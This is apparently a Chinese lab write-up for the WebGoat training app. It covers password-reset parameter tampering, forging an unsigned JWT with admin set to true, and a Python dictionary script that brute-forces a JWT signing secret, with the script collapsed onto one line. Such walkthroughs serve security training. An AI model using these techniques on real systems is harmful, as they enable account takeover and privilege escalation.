webgoat靶场复现

1、安装

github：发布 ·网站网格/网站网格 (github.com)

新手篇丨Web安全入门之WebGoat8.0环境搭建 - 知乎

Broken Authentication(身份验证)模块

0x02

newPassword111=aaaa&newPasswordConfirm222=aaa&userId=12309746

JWT tokens

0x04 Background Unverified Signature

转到 JWT 在线解密—LZL在线工具 (lzltool.cn) JWT Token在线解析解码 - ToolTT在线工具箱解码 jwt-token，然后将 admin 修改为 true 并使用以下脚本重新编码标头和有效负载，不添加签名部分，发送请求

jwt 安全参考：
http://4hou.win/wordpress/?p=23278
https://zhuanlan.zhihu.com/p/71672282
https://segmentfault.com/a/1190000010312468

0x05 jwt blasting

参考：https://www.freebuf.com/vuls/216457.html
在线验证：https://jwt.io/#debugger

实际上，只有几个与jwt相关的问题，只需尝试一下。这是暴力破解的密钥。github上有一个c语句版本的暴力破解软件，但它似乎一次尝试一个字符，所以它非常慢。反正我没有用完几次，几乎卡住了我的电脑。因此，我们可以使用 JWT 库自己编写脚本，也可以使用 github 上提供的脚本。这个python拆除脚本是基于字典的，所以首先你必须有一个强大的字典。我的字典不够强大，不足以让我几次不拆除，所以我只是去源头并翻出一些秘密密钥添加到我的字典中，"victory","business","available", "shipping", "washington"如下所示：

Blast脚本（您需要提供自己的字典）：

import termcolor
import jwt
if __name__ == "__main__":jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU3MjY4ODA3MSwiZXhwIjoxNTcyNjg4MTMxLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.2n1lN_F-Pk8GXxw7nAneMt1C4ExfH7mVdtQF9nMKhVs'with open('/opt/burp/pass.txt') as f:for line in f:key_ = line.strip()try:jwt.decode(jwt_str, verify=True, key=key_)print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept jwt.exceptions.InvalidSignatureError:print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)continueelse:print('\r', '\bsorry! no key be found.')

解密打不开以后在做

参考：

Java代码审计入门：WebGoat8（再会） - FreeBuf网络安全行业门户